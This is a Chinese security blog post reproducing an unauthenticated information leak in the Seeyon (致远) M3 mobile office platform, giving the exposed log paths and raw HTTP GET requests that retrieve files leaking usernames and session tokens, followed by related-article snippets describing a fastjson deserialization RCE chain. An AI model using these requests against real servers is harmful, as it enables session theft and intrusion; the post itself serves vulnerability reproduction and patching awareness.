致远M3 log 敏感信息泄露漏洞

最新推荐文章于 2024-09-27 14:28:43 发布
最新推荐文章于 2024-09-27 14:28:43 发布
阅读量847 收藏 3
点赞数 12
文章标签: 渗透 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/138561141
版权

文章目录

免责

只为学习与交流,若利用做一切违法乱纪的事与本人无关

漏洞描述

致远M3是一个企业移动业务管理平台,全面覆盖各种工作场景,通过智能化的办公和业务场景融合,为企业构建新一代的移动智能工作方式

漏洞原理

/mobile_portal/logs/autoLogin.log
/mobile_portal/logs/app.log
/mobile_portal/logs/requset.log
接口处存在存在信息泄露

影响版本

不详

漏洞复现

在这里插入图片描述
进行访问泄露接口

GET /mobile_portal/logs/autoLogin.log HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

在这里插入图片描述
可以看到session泄露

GET /mobile_portal/logs/app.log HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

在这里插入图片描述

GET /mobile_portal/logs/requset.log HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Length: 2

在这里插入图片描述

修复方法

官方已更新补丁,请升级至最新版本。

漏洞复现】致远-M3-信息泄露-mobile_portal
知黑而守白
07-05 452
致远OA移动智能办公平台mobile_portal接口处存在敏感信息泄露漏洞,未授权访问的日志文件泄露数据包括用户名、session和系统接口信息等,恶意攻击者可能利用该敏感信息对服务器进行进一步的攻击,从容团队服务器造成危害。致远OA移动智能办公平台是一款基于移动互联网和云计算技术的移动办公软件,为企业提供随时随地、安全高效的办公体验。1、限制接口访问权限。
致远M3 Session 敏感信息泄露漏洞复现
0xSec
05-07 1659
致远M3 server多个日志文件存在敏感信息泄露漏洞,允许未经身份验证的远程攻击者访问日志文件,泄露了登陆用户名及session等敏感信息,使系统处于极不安全的状态。
致远M3移动办公系统平台存在敏感信息泄露/未授权访问漏洞
weixin_43167326的博客
05-07 1760
致远M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息
(1day)致远M3 log 敏感信息泄露漏洞(Session)复现
记录开发和安全学习过程中的点点滴滴
05-08 2154
系统学习web漏洞挖掘以及项目实战也有一段时间了,发现在漏洞挖掘过程中难免会碰到一些历史漏洞,来帮助自己或是提高自己挖洞和及时发现漏洞效率,于是开始创建这个专栏,对第一时间发现的1day以及历史漏洞进行复现,来让自己更加熟悉漏洞类型以及历史漏洞,方便自己在后续的项目实战中,碰到漏洞能够及时去查询和复现.
致远M3-server 反序列化RCE漏洞
m0_71285176的博客
01-10 2179
致远M3 server中 mobile_portal接口处存在fastjson反序列化漏洞漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
致远M3 反序列化RCE漏洞复现(XVE-2023-24878)
0xSec
11-24 5866
致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
致远OA properties接口存在敏感信息泄露漏洞
最新发布
09-28
致远OA properties接口的敏感信息泄露漏洞是一个严重的问题,它提醒所有用户,尤其是企业用户,必须对系统的安全性给予高度的关注,并采取积极的措施来保护信息系统免受攻击,确保信息安全和业务的连续性。
致远OA rest/m3/common/system/properties接口存在敏感信息泄露漏洞 附POC
nnn2188185的博客
09-27 424
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发致远互联oa办公自动化软件系统,实现企业审批/报销/门户/公文/文档/采购/费用等综合管理,致远互联oa办公自动化软件系统,满足企业一体化办公需求。
PeiQi0#PeiQi-WIKI-Book#致远OA A6 createMysql.jsp 数据库敏感信息泄露1
07-25
致远OA A6 createMysql.jsp 数据库敏感信息泄露漏洞描述致远OA A6 存在数据库敏感信息泄露,攻击者可以通过访问特定的URL获取数据库账户以
fbion#PeiQi-WIKI-POC#致远OA A6 DownExcelBeanServlet 用户敏感信息泄露1
07-25
致远OA A6 DownExcelBeanServlet 用户敏感信息泄露漏洞描述致远OA A6 存在某个未授权的接口导致任意访问者可下载OA中的用户信息漏洞
致远 M3 移动工作平台 V3.1.0安装维护手册.pdf
04-08
致远 M3 移动工作平台 V3.1.0安装维护手册.pdf
致远OAM3移动端介绍
01-29
OA系统中关于移动端软件的介绍,可以帮助你快速的了解一下致远OA系统的使用和介绍
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2567
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
漏洞复现--致远 M3 反序列化 mobile_portal RCE
qq_53003652的博客
11-27 5485
M3server提供了多种功能模块,涵盖了办公自动化、项目管理、文档管理、流程管理、日程安排、知识管理等方面。再请求/mobile_portal/api/systemLog/pns/loadLog/app.log接口。严格限制/mobile_portal/接口的访问权限,关注厂家官网获取修复补丁。使用ysoserial生成CB链TomcatCmdEcho回显内存马。利用CB1链生成hex代码,替换POC中的HEX。执行命令,在请求内容加上cmd执行命令回显。致远M3 server。成功执行ping命令。
致远OA漏洞利用工具SeeyonExploit使用指南
gitblog_00204的博客
08-10 713
致远OA漏洞利用工具SeeyonExploit使用指南 项目地址:https://gitcode.com/gh_mirrors/se/seeyon-exploit 1. 项目目录结构及介绍 . ├── cmd # 包含主程序命令行接口代码 ├── core # 核心功能模块 ├── vulners # 漏洞检测相关代码...
致远OA敏感信息泄露漏洞合集(含批量检测POC)
今天是几号的博客
03-21 9329
用友致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题,是组织管理的最佳实践。产品系列: A3、A6、A8品牌: 用友对象: 微型、小型企业、企业部门级。
[漏洞合集]致远获取后台权限及权限绕过漏洞大合集
LiangYueSec的博客
07-25 3240
[漏洞合集]致远获取后台权限及权限绕过漏洞大合集
致远漏洞(登陆绕过+任意文件上传)
bring_coco的博客
07-10 3326
1.获得cookie每次请求都会得到一个cookie值,都可以用,如下:失败的cookie如下:2.上传zip文件注意这里zip文件直接burp右键paste from file放进去即可这里压缩文件如上3.解压压缩文件可以看到报错找不到指定文件,是因为我们压缩包中没有带layout.xml,其必须存在否则在利用解压漏洞时会解压失败空内容即可注意上传目录:然后我重新生成zip文件再次解压,但是访问不到,应该这里有问题因为解压出来的目录都为空,直接用下面脚本吧。
致远M3-server反序列化RCE
weixin_62352348的博客
01-19 1195
致远M3-server反序列化RCE
致远oa a6 用户敏感信息泄露
09-27
致远OA A6用户敏感信息泄露事件是一个严重的安全漏洞,给用户的隐私和数据安全造成了重大威胁。根据目前的报道和了解,此漏洞可能使黑客能够非法访问用户的敏感信息,对用户的个人隐私和公司数据造成不可挽回的损失...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值